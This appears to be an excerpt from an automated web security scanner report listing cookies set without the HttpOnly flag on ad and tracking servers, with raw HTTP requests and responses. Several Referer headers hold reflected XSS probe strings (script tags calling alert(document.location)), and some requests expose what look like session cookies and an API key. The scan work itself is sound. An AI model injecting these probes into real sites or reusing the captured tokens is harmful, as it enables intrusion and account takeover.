User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; ih="b!!!!<!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ve/>1!4j#(Ncl]A; BX=ei08qcd75vc4d&b=3&s=8s&t=246; liday1=$4^M3!4j#(oZ>LE

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:03:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!%=4X0s!#eCK!!!!%=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; path=/; expires=Wed, 11-Sep-2013 13:03:53 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 13:03:53 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
5.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
5.8. http://affiliates.lynda.com/42/510/50/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliates.lynda.com
Path:   /42/510/50/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /42/510/50/ HTTP/1.1
Host: affiliates.lynda.com
Proxy-Connection: keep-alive
Referer: http://drupalsn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Sep 2011 12:48:52 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_vtc=1c6d88f30e0ecdccd9fbf10eb320e373; expires=Wed, 12-Oct-2011 12:48:52 GMT; path=/
Location: http://files.lynda.com/files/lol_partners/art/lynda_bnr_180x150_growBrain.gif
X-Server-Name: www@dc1dtweb150
Content-Length: 0
Content-Type: image/gif

5.9. http://api.bizographics.com/v1/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

5.10. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...
5.11. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

5.12. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
5.13. http://btg.mtvnservices.com/aria/guid.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://btg.mtvnservices.com
Path:   /aria/guid.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aria/guid.html HTTP/1.1
Host: btg.mtvnservices.com
Proxy-Connection: keep-alive
